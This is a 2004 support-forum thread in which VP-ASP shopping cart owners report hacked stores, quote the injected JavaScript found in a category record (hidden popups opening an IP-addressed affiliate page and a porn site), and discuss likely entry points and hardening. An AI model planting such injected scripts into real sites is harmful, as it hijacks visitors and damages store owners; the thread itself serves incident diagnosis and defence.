VP-ASP :: Shopping Cart Software

Shopping Cart Software Solutions for anywhere in the World

US/Canada(Toll Free): +1 888 587 2278
Europe/UK: +44 (020) 7193 9408
Australia/New Zealand: +61 3 9016 4497

VP-ASP Shopping Cart Customer Forum

Home | Profile | Register | Active Topics | Members | Search | FAQ
Username:
Password:
Save Password
Forgot your Password?

 All Forums
 VPCart Forum
 Credit card fraud and hackers
 Shop Causes Popup - freesextogo.com
 New Topic  Reply to Topic
 Printer Friendly
Author Previous Topic Topic Next Topic  

maduko
VP-ASP New User

52 Posts

Posted - March 07 2004 :  20:53:49  Show Profile  Reply with Quote
Shop pages are opening a popup window. When closed it opens a spam page from freesextogo.com. Has anyone else experienced this?

The source of the popup follows...


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Untitled</title>
</head>
<script language="JavaScript">
function ourl1() {
window.open("http://www.freesextogo.com", "_blank");
}
</script>
<body>
<body onunload="javascript:ourl1()">
</body>
</html>

support
Administrator

4266 Posts

Posted - March 07 2004 :  21:04:10  Show Profile  Visit support's Homepage  Reply with Quote
You site has probably been hacked. Take a look in your product and category records to see if a javascript has been put into one of your product description.

Please check our security notices and fixes www.vpasp.com/virtprog/info/faq_security.htm

VP-ASP Support

Go to Top of Page

maduko
VP-ASP New User

52 Posts

Posted - March 07 2004 :  21:10:41  Show Profile  Reply with Quote
I get this popup on any page that loads the shop&db and shopfileio includes. You think I should start looking in the products and categories?

I will review the security notice again- I have tried to stay up on all of those.



Go to Top of Page

maduko
VP-ASP New User

52 Posts

Posted - March 07 2004 :  21:14:25  Show Profile  Reply with Quote
You were right. The Publications category had been worked over with this addition...


<br> <br> <SCRIPT LANGUAGE=JavaScript> window.open("http://69.47.51.171/links/aff/aff.php", "_blank","toolbar=no, scrollbars=no, menubar=no, width=1, height=1, left=1, top=1"); </SCRIPT> <br>


Thanks for your help.

Go to Top of Page

tonyhrx
Starting Member

United Kingdom
3 Posts

Posted - March 09 2004 :  04:27:50  Show Profile  Visit tonyhrx's Homepage  Reply with Quote
OK I got hacked this morning with this pop up. Hackers had changed shoppageheader.asp and had also managed to alter a category item in the shopping400.mdb file so that the pop-up remained.



Tony Horrocks
Go to Top of Page

tonyhrx
Starting Member

United Kingdom
3 Posts

Posted - March 09 2004 :  05:12:07  Show Profile  Visit tonyhrx's Homepage  Reply with Quote
What's worrying is that we have firewalls up, follow VPASP security advice yet someone is still able to do this sort of stuff. Anyone any ideas?

Tony Horrocks
Go to Top of Page

devshb
Senior Member

United Kingdom
1898 Posts

Posted - March 09 2004 :  07:11:13  Show Profile  Visit devshb's Homepage  Reply with Quote
I could be wrong, but...

if the hacker actually managed to change the asp code itself (as opposed to just getting into the database), then it looks like it's your server/directories that are vulnerable, not just vp-asp stuff.

it looks like the hacker managed to get direct access to your site with something like ftp.

obviously I don't know anything about your server, but if you've got something like an admin user in the database with the same id/pwd as the server/ftp connection details, then someone might have used that.

or, it could be an inside-job.

whatever it is, i agree it's pretty scary.


there is something else which might be worth mentioning here, which is that if you upload all your default vpasp stuff to a publicy available domain, and then do the security measures afterwards, you'd leave yourself vulnerable in between the initial-posting and the security-update, during which time someone might have been able to grab/do what they needed so that they could then go back again later on, even if the security measures are in place.
it's just a personal view, but because of this potential vulnerability-time, i'd always implement the standard vp-asp-advised security measures, and then after that'd been done, I'd do some of those things again (changing the admin login page again, changing ALL the admin ids/pwds again), and I wouldn't put anything into the database until that'd been done. Then, I'd check the database contents are blank/default and that no spurious files are on the server.

Edited by - devshb on March 09 2004 07:20:43
Go to Top of Page

sfarling
Starting Member

3 Posts

Posted - March 09 2004 :  09:02:49  Show Profile  Visit sfarling's Homepage  Reply with Quote
Got me too.
Scott

Go to Top of Page

siraj
VP-ASP New User

USA
194 Posts

Posted - March 09 2004 :  14:35:53  Show Profile  Visit siraj's Homepage  Reply with Quote
I think in maduko case, the did not get into the server but only te database and the admin pages. Once you get control of the admin page, they have put the above html/js script in the category table. So when asp try to get the category field populate into asp page, then we see the result. I dont believe that they have get control of the server.
GOOD LUCK.
SJ.

[email protected]
Go to Top of Page

devshb
Senior Member

United Kingdom
1898 Posts

Posted - March 09 2004 :  15:05:47  Show Profile  Visit devshb's Homepage  Reply with Quote
i agree; i may have caused undue alarm there; i was only talking about tonyhrx's posting (the "Hackers had changed shoppageheader.asp" bit)
if the javascript had been added to the category, then i guess it would give the appearance of changing shoppageheader.asp, but it wouldn't have actually caused a physical change to the file.

but if shoppageheader.asp had physically been changed, then there would be a larger more serious problem.

Edited by - devshb on March 09 2004 15:08:50
Go to Top of Page

siraj
VP-ASP New User

USA
194 Posts

Posted - March 09 2004 :  22:22:50  Show Profile  Visit siraj's Homepage  Reply with Quote
I agree with devshb. What is scary is tonyhrx's case, he got firewall set up and still the hackers manages to get? Something really missing! There are couple of possiblities like devshb said, hackers might have downloaded the db and coincidence if you are using the same admin/pass for the server then forget it!!! But again with fire wall setup how can hackers change the shopage_header? Simply I did not get it. Is there any better explanation?
Second chance is, you directory permision might have setup incorrectly so hackers can do whatever they want!
GOOD LUCK.
SJ.

[email protected]
Go to Top of Page

Cam
VP-ASP Super User

Australia
361 Posts

Posted - March 12 2004 :  06:09:11  Show Profile  Visit Cam's Homepage  Reply with Quote
While this add-on won't stop hackers initially it will certainly help keep you in the loop when your site is hit.

We have an add-on that allows you to be notified each time someone tries to access the admin and after the 2nd failed attempt will block the hacker from being able to get in.

http://www.yourvirtualstore.net/rocksalt_v.5/shopdisplayproducts.asp?id=13&cat=Paid+Add%2Dons#132

We also have a version for 4.5.

You can also use IP blocking code to keep them out if you have a static IP address.

Have a look at the following post on our forum for info on how to do this:

http://www.yourvirtualstore.net/rocksalt_v.5/forum/display_topic_threads.asp?ForumID=12&TopicID=1001

Hope this helps.

Cheers,
Cam

*************************************
Cam Flanigan
YourVirtualStore Sales
e-mail:
http://www.vpasp.com/sales/shopcustcontact.asp
web: http://www.yourvirtualstore.net

Build you own YourVirtualStore!!!
www.yourvirtualstore.net
*************************************

Edited by - cam on March 12 2004 06:09:58
Go to Top of Page

dfreeman
Starting Member

USA
6 Posts

Posted - March 29 2004 :  09:28:22  Show Profile  Visit dfreeman's Homepage  Reply with Quote
The freesextogo.com link was just sent last night to all of the shoppers in one of my online stores using vpasp. The database is SQL and to my knowledge we have implemented all of the recommended security fixes. The email came from the email address used by the shopping cart and the subject line was 'Shopping Order'.

Not so good, since this site is a Christian ministry and now its shoppers all got an email link to a porn site, seemingly from the ministry.

David Freeman
Go to Top of Page

Cam
VP-ASP Super User

Australia
361 Posts

Posted - March 29 2004 :  23:05:45  Show Profile  Visit Cam's Homepage  Reply with Quote
Hi David,

Do you know how they got access?

Feel free to email us off-list if you want to go over some options to avoid this in future.

http://www.vpasp.com/sales/shopcustcontact.asp

Regards,
Cam

*************************************
Cam Flanigan
YourVirtualStore Sales
e-mail:
http://www.vpasp.com/sales/shopcustcontact.asp
web: http://www.yourvirtualstore.net

Build you own YourVirtualStore!!!
www.yourvirtualstore.net
*************************************
Go to Top of Page
  Previous Topic Topic Next Topic  
 New Topic  Reply to Topic
 Printer Friendly
Jump To:
Snitz Forums 2000